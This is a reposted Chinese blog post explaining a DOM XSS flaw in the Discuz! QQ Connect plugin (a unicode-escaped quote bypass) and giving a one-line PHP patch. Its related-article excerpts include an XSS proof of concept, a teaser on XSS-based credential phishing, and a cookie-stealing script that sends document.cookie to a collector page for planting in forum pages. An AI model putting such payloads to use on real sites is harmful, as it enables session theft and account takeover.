xss防御补丁_Discuz论坛最新dom xss漏洞的解决方法

最新推荐文章于 2023-11-21 15:57:20 发布
最新推荐文章于 2023-11-21 15:57:20 发布
阅读量414 收藏
点赞数
文章标签: xss防御补丁
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28920823/article/details/112888612
版权

无忧主机小编在日常处理客户网站问题时,经常遇到网站因为程序漏洞出现的问题。网站安全的发展,才能使得管理者放心营运。但是比较无奈的是,漏洞问题貌似屡见不鲜,就算再强大、再常用的程序,都会有诸如漏洞的问题,如discuz。下面是我们今天要讲的漏洞:

qq互联插件dom xss漏洞

关于漏洞的描述:

在JS字符串中,字符还可以表示为unicode的形式。

即:单引号还可以表示为\u0027或\x27。由于没有过滤" \ " 绕过了防御,形成漏洞。

关于漏洞的危害:

1.恶意用户可以使用该漏洞来盗取用户账户信息、模拟其他用户身份登录,更甚至可以修改网页呈现给其他用户的内容。

2.恶意用户可以使用JavaScript、VBScript、ActiveX、HTML语言甚至flash应用的漏洞来进行攻击,从而来达到获取其他的用户信息目的。

解决方法:

临时解决方案: (感谢站长飞鸟网络提供的临时解决方案)

Discuz! X2 需要修改的文件: \source\module\connect\connect_login.php

Discuz! X2.5 需要修改的文件: \source\plugin\qqconnect\connect\connect_login.php

Discuz! X3.0 需要修改的文件: \source\plugin\qqconnect\connect\connect_login.php

(版本不同,修复方法是一样的)

在19行 $referer = dreferer(); 的上面加上如下代码:

$_GET['referer'] = strtr($_GET['referer'],'\\','/');

官方补丁:

2013-2-22 官方已发布补丁,推荐站长使用官方补丁进行升级

相关文章推荐阅读:

Wo Discuz!X小提示论坛FLASH配置不当漏洞警告的解决方法

Discuz! X2.5在线升级BUG:“static/image/postbg/3.jpg下载出现问题”

Discuz x3.1漏洞导致的QQ登入失败,提示“(1054) Unknown column ‘conuintoken’ in ‘field list’”

本文地址:https://www.51php.com/discuz/13631.html

Gabriel 彭子傑
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现】Discuz-x3.1 插件漏洞
weixin_47443077的博客
05-27 1977
Discuz-x3.1 插件漏洞 文章目录Discuz-x3.1 插件漏洞一、漏洞背景二、信息收集三、漏洞利用 一、漏洞背景 作为国内最大的社区软件及服务提供商,Comsenz旗下的 Discuz! 开发组具有丰富的 web应用程序设计经验,尤其在论坛产品及相关领域,经过长期创新性开发,掌握了一整套从算法,数据结构到产品安全性方面的领先技术。使得 Discuz! 无论在稳定性、负载能力、安全保障等方面都居于国内外同类产品领先地位。 二、信息收集 本地IIS搭建Discuz-x3.1,发现不能直接访问 进行
利用xss漏洞结合xss平台实现社工钓鱼
2ed
01-03 7179
本文主要介绍如何结合 xss平台 利用xss漏洞 然后,伪造一个钓鱼登陆页,然后,实现钓鱼,获取 用户和密码,之后传到我们的公网服务器中 首先我们需要一个存在xss漏洞的网站,不管是反射或存储,只要它有txtx ,然后呢你还得有一台公网服务器,当然在局域网中的话就可以考虑用自己的物理机开一个web服务器。用来接收钓鱼页 post回来的用户和密码。然后呢 随便去个xss平台注册 ,我注册的是这个x...
xss漏洞修复建议/方法
小雨的博客
05-10 1万+
1. html encoding 跨站点脚本漏洞最有效的解决方案是对用户受影响输出进行 HTML encoding。 应用程序应该对:直接源自用户输入的值、可能受用户影响的值、受用户影响的数据存储库值(数据库、日志、文件等)或可能具有的任何其他信息的任何输出进行编码。 在将这些值包含在发送给用户的输出中之前,应通过数据清理组件(编码器)处理此信息,该组件替换其 HTML 表示中的非字母数字字符。此操作确保每个脚本都将呈现给用户,而不是在用户的浏览器中执行。 这些信息在传输中应该执行净化:替换掉
XSS漏洞-01】XSS漏洞简介、危害与分类及验证
m0_64378913的博客
05-13 2万+
目录1 XSS漏洞简介2 XSS漏洞危害3 XSS漏洞分类3.1 反射型XSS3.2 存储型XSS3.3 DOMXSS3.3.1 节点树模型3.3.2 DOMXSS4 漏洞验证4.1 漏洞验证相关概念4.2 漏洞验证相关概念之间的区别4.3 常见POC5 XSS漏洞验证实例5.1 反射型XSS漏洞验证实例5.2 存储型XSS漏洞验证实例5.3 DOMXSS漏洞验证实例6 总结参考文章 1 XSS漏洞简介 定义/原理:跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是
1-Web安全——XSS跨站脚本漏洞
网络安全
07-07 798
1. XSS漏洞原理解析 XSS跨站脚本攻击(Cross Site Scripting,简称为XSS)是一种针对web网站安全的漏洞攻击技术,恶意攻击者利用网站程序对用户输入过滤不足,在网站中插入对用户有影响的恶意脚本代码(通常是js或html等脚本代码),当用户使用浏览器打开浏览该网页时,恶意代码就会在用户浏览器上执行,从而盗取用户cookie,黑掉网页,导航到恶意网站。 看起来XSS漏洞主要是攻击用户,属于客户端攻击,跟网站服务器的安全并没有直接关系,但是别忘了web网站的管理后台的用户也属于被攻击
XSS_Rays.zip_XSS Rays 下载_tool_xss扫描_xss扫描器_漏洞扫描
09-22
基于JS的XSS扫描器——XSS Rays. 最近The Spanner发布了一个名为XSS Rays的 XSS漏洞扫描器。这tool有点意思,是使用JS写的,JS遍历目标的link、form,然后构造测试用例...当然,我觉得要解决DOM XSS最终还是要靠JS引擎
discuz X25 某功能存在 xss漏洞以及解决方案
09-28
discuz X25 某功能存在 xss漏洞 html 脚本未过滤
XSS.zip_XSS_c xss
09-24
2. **存储型XSS(Persistent XSS)**:又称持久性XSS,攻击者将恶意脚本存储在服务器端,例如在论坛发帖、评论区留言等。当其他用户浏览这些页面时,恶意脚本会自动执行。 3. **DOMXSSDOM-Based XSS)**:不...
JSP过滤器防止Xss漏洞的实现方法(分享)
01-08
而通常为了避免Xss漏洞,都是开发人员各自在页面输出和数据入库等地方加上各种各样的encode方法来避免Xss问题。而由于开发人员的水平不一,加上在编写代码的过程中安全意识的差异,可能会粗心漏掉对用户输入内容进行...
xss漏洞原因以及如何应对
风烟
01-26 9042
场景一:获取URL参数含有脚本执行 比如我们需要获取URL中某个参数,然后输出到页面当中 比如链接是http://xxx?search="><script>alert('xss')</script>这种,我们解析search参数拼接html的之后直接用了这个参数,这个时候浏览器不知道是恶意代码,直接就执行了, <div> xxx: "><script>alert('xss')</script> </div> 这
Discuz补丁更新备忘
icodec的专栏
09-21 463
1、登录后台后检查版本,查看是否有更新。 2、按照Discuz官方的说明进行操作。(注意是否要备份相关的内容) 3、下载到本地,和当前站点的文件进行快速的比较。看是否有自己修改的。有的话,则合并到下载的补丁上。 4、上传到服务器上。执行cp命令。 cp -r upload/* yousite.com/ 如果没有修改的,也可以在服务器上直接wget。 5、登
xss漏洞php注射实战,利用XSS渗透DISCUZ 6.1.0实战
weixin_42347699的博客
03-11 177
论坛——>入侵者布置的跨站攻击——>转移被入侵这视线(隐蔽)论坛插入脚本:var img = new Image();img.src = 'get_cookie.php?var=' + encodeURI(document.cookie);但是我不一样,因为他需要诱导人去点击他的链接,但是现在人不是傻子,不会轻易点你的链接。而我是要把脚步插入论坛页面中,这样既隐蔽又省去了诱导的力气我插...
Discuz7.X爆注册验证码提取XSS跨站漏洞 金山、卡巴等大型论坛也无一避免
weixin_34226706的博客
03-16 117
动物家园计算机安全咨询中心(www.kingzoo.com)反病毒斗士报: 2010年3月16日,凌晨接到线报说 Discuz!7.0-7.2出现注册验证码提取XSS跨站漏洞,经过有关测试证实存在。 随机点了下跟本站友情连接的站点,发现都存在这个问题。XSS跨站漏洞,其***手段不仅仅在于COOKIE信息获取、欺骗用户执行恶...
discuz漏洞汇总
热门推荐
hacker0ne的博客
05-05 5万+
Discuz漏洞拿服务器 路径泄露 ‘api/addons/zendcheck.php’, ‘api/addons/zendcheck52.php’, ‘api/addons/zendcheck53.php’, ‘source/plugin/mobile/api/1/index.php’, ...
dz论坛Discuz_X3.4最新网站漏洞
网站安全专家
07-11 4万+
近期我们sinesafe安全部门审计discuz最新版的时候发现配置文件写入导致代码执行的问题。cms安装的时候一般会分为几个步骤去进行,其中有对配置文件config进行写入的步骤,当写入的时候未严格限制传入的参数就存在代码执行问题。源码信息:Discuz_X3.4_GIT_SC_UTF8问题文件: \upload\install\index.php漏洞类型:配置文件写入导致代码执行站点地址:ht...
DOMXSS详讲
最新发布
weixin_59047731的博客
11-21 1829
在网站页面中有许多元素,当页面到达浏览器时,浏览器会为页面创建一个项级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。也就是说,客户端的脚本程序可以通过DOM动态修改页面内容,从客户端获取DOM中的数据并在本地执行。由于DOM是在客户端修改节点的,所以基于DOM型的XSS漏洞不需要与服务器端交互,它只发生在客户端处理数据的阶段。除了富文本的输出之外,在变量输出到HTML页面时,可以使用编码或者转义的方式来防御XSS攻击。
uctools.php,Discuz曝出安全隐患 XSS脚本漏洞和uctools.php
weixin_42130862的博客
03-13 342
Discuz安全:存储型XSS脚本漏洞确认 影响所有Discuz版本该漏洞6月23日在网上公开并得到discuz官方确认,可影响Discuz几乎所有版本,从目前还比较流行的Discuz 6.0到最新Discuz X2都存在这一漏洞。今天有官方团队在论坛放出过修补教程,但目前该帖设置访问权限限制,以下是百度快照中保存的修改方案,仅大家参考。disuczcode 函数存在解析漏洞, 用户可以直接在帖...
XSS漏洞详解
xcxhzjl的博客
11-18 2万+
一、XSS漏洞原理 XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的应用程序或代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码,少数情况下还有ActionScript、VBScript等语言),当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面或打开收到的URL链接时,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。 当应用程序没有对用户提交的内容进行验证和重新编码,而是直接呈现给网站的访问者时,就可能会触发XSS攻击。 二、XSS漏洞的危
XSS漏洞防御方法
06-03
XSS(跨站脚本攻击)是常见的Web安全漏洞之一,攻击者可以通过在网页中插入恶意脚本来攻击用户。为了防范XSS攻击,可以采取以下一些措施: 1.输入过滤:对于用户输入的数据进行过滤,过滤掉HTML标签和JavaScript...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值